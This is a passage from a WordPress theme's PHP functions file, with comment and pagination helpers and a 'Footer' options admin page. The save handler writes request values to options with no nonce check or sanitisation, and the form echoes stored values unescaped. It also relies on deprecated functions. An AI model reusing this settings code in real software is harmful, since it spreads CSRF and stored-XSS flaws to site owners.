    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
